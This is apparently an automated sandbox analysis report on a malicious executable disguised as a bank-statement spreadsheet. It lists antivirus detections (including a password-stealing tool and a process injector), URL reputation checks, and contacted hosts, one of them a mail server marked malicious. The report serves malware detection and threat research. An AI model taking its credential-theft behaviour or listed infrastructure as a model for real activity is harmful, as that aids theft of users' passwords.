                33.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                37.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                14.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack100%AviraTR/AD.MExecute.lzracDownload File
                21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
                1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                16.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                7.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
                2.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack100%AviraTR/AD.MExecute.lzracDownload File
                1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
                28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                29.1.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack100%AviraTR/AD.MExecute.lzracDownload File
                15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
                28.2.BANK-STATMENT _xlsx.exe.2750000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                1.1.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpack100%AviraTR/AD.MExecute.lzracDownload File
                29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
                20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                31.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                29.2.BANK-STATMENT _xlsx.exe.ad0000.1.unpack100%AviraTR/Inject.vcoldiDownload File
                20.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                14.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                35.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                28.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                34.1.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                38.1.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                33.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                26.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
                23.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                34.2.BANK-STATMENT _xlsx.exe.22d0000.1.unpack100%AviraTR/Inject.vcoldiDownload File
                21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                39.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                21.1.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                15.2.BANK-STATMENT _xlsx.exe.810000.1.unpack100%AviraTR/Inject.vcoldiDownload File
                38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                21.2.BANK-STATMENT _xlsx.exe.2150000.1.unpack100%AviraTR/Inject.vcoldiDownload File
                29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                38.2.BANK-STATMENT _xlsx.exe.2230000.1.unpack100%AviraTR/Inject.vcoldiDownload File
                34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpack100%AviraTR/AD.MExecute.lzracDownload File
                34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
                1.2.BANK-STATMENT _xlsx.exe.9d0000.1.unpack100%AviraTR/Inject.vcoldiDownload File
                38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpack100%AviraTR/AD.MExecute.lzracDownload File
                38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
                15.1.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.carterandcone.comsig0%Avira URL Cloudsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.carterandcone.com#0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/://w70%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/typo0%Avira URL Cloudsafe
                http://www.founder.com.cn/cnrb0%Avira URL Cloudsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/Y0s0%Avira URL Cloudsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.carterandcone.com0%URL Reputationsafe
                http://www.carterandcone.com0%URL Reputationsafe
                http://www.carterandcone.com0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/alny0%Avira URL Cloudsafe
                http://whatismyipaddress.comx&0%Avira URL Cloudsafe
                http://www.founder.com.cn/cnD0%Avira URL Cloudsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.fontbureau.com)0%Avira URL Cloudsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/70%Avira URL Cloudsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/font0%Avira URL Cloudsafe
                http://www.fontbureau.comcom0%URL Reputationsafe
                http://www.fontbureau.comcom0%URL Reputationsafe
                http://www.fontbureau.comcom0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/)0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/jp/N0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/Norm0%Avira URL Cloudsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.founder.com.cn/cnZ0%Avira URL Cloudsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.fontbureau.comueed0%Avira URL Cloudsafe
                http://www.galapagosdesign.com/0%URL Reputationsafe
                http://www.galapagosdesign.com/0%URL Reputationsafe
                http://www.galapagosdesign.com/0%URL Reputationsafe
                http://www.fontbureau.comF0%URL Reputationsafe
                http://www.fontbureau.comF0%URL Reputationsafe
                http://www.fontbureau.comF0%URL Reputationsafe
                http://www.galapagosdesign.com/S0%Avira URL Cloudsafe
                http://www.carterandcone.comc0%Avira URL Cloudsafe
                http://www.carterandcone.comTC0%URL Reputationsafe
                http://www.carterandcone.comTC0%URL Reputationsafe
                http://www.carterandcone.comTC0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/N0%Avira URL Cloudsafe
                https://whatismyipaddress.comx&0%Avira URL Cloudsafe
                http://go.microsoft.0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/E0%Avira URL Cloudsafe
                http://go.microsoft.LinkId=421270%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                http://www.fontbureau.coma0%URL Reputationsafe
                http://www.fontbureau.coma0%URL Reputationsafe
                http://www.fontbureau.coma0%URL Reputationsafe
                http://www.fontbureau.comd0%URL Reputationsafe
                http://www.fontbureau.comd0%URL Reputationsafe
                http://www.fontbureau.comd0%URL Reputationsafe
                http://www.carterandcone.comg0%Avira URL Cloudsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/Y0nt0%Avira URL Cloudsafe
                http://www.founder.com.cn/cn/0%URL Reputationsafe
                http://www.founder.com.cn/cn/0%URL Reputationsafe
                http://www.founder.com.cn/cn/0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.fontbureau.come0%Avira URL Cloudsafe
                http://www.fontbureau.comoitu0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                whatismyipaddress.com
                		104.16.154.36
                		truefalse
                  		high
                  mail.iigcest.com
                  		166.62.27.57
                  		truetrue
                    		unknown
                    201.75.14.0.in-addr.arpa
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://whatismyipaddress.com/false
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.carterandcone.comsigBANK-STATMENT _xlsx.exe, 00000001.00000003.670678801.0000000005126000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.com/designersGBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.carterandcone.com#BANK-STATMENT _xlsx.exe, 00000001.00000003.671131128.0000000005127000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/://w7BANK-STATMENT _xlsx.exe, 00000001.00000003.671578581.00000000050F4000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.com/designers?BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                              		high
                              http://www.jiyu-kobo.co.jp/typoBANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000003.672193622.00000000050FB000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.founder.com.cn/cnrbBANK-STATMENT _xlsx.exe, 00000001.00000003.668963519.000000000510A000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.tiro.comBANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/Y0sBANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designersBANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                		high
                                http://www.goodfont.co.krBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.carterandcone.comBANK-STATMENT _xlsx.exe, 00000001.00000003.670678801.0000000005126000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/alnyBANK-STATMENT _xlsx.exe, 00000001.00000003.672193622.00000000050FB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designersSBANK-STATMENT _xlsx.exe, 00000001.00000003.676434970.0000000005128000.00000004.00000001.sdmpfalse
                                  		high
                                  http://whatismyipaddress.comx&BANK-STATMENT _xlsx.exe, 0000000F.00000002.801748838.0000000002B0E000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884820790.0000000002B4E000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.915036172.0000000002C3E000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.founder.com.cn/cnDBANK-STATMENT _xlsx.exe, 00000001.00000003.669162564.0000000005122000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.sajatypeworks.comBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com)BANK-STATMENT _xlsx.exe, 00000001.00000002.773005820.0000000005100000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.founder.com.cn/cn/cTheBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/7BANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://fontfabrik.comBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/fontBANK-STATMENT _xlsx.exe, 00000001.00000003.671578581.00000000050F4000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.msn.com/de-ch/?ocid=iehpHLMEMhvbc.exe, 0000001A.00000002.838373686.0000000000758000.00000004.00000020.sdmpfalse
                                    		high
                                    http://www.fontbureau.comcomBANK-STATMENT _xlsx.exe, 00000001.00000003.676664424.00000000050FF000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designersdBANK-STATMENT _xlsx.exe, 00000001.00000003.676177368.0000000005121000.00000004.00000001.sdmpfalse
                                      		high
                                      http://whatismyipaddress.com/-BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.galapagosdesign.com/DPleaseBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/)BANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/jp/NBANK-STATMENT _xlsx.exe, 00000001.00000003.672193622.00000000050FB000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://login.yahoo.com/config/loginBANK-STATMENT _xlsx.exe, vbc.exefalse
                                          		high
                                          http://www.fonts.comBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.jiyu-kobo.co.jp/NormBANK-STATMENT _xlsx.exe, 00000001.00000003.671578581.00000000050F4000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.sandoll.co.krBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.site.com/logs.phpBANK-STATMENT _xlsx.exe, 00000022.00000002.915036172.0000000002C3E000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.founder.com.cn/cnZBANK-STATMENT _xlsx.exe, 00000001.00000003.669162564.0000000005122000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.urwpp.deDPleaseBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.nirsoft.net/BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpfalse
                                                		high
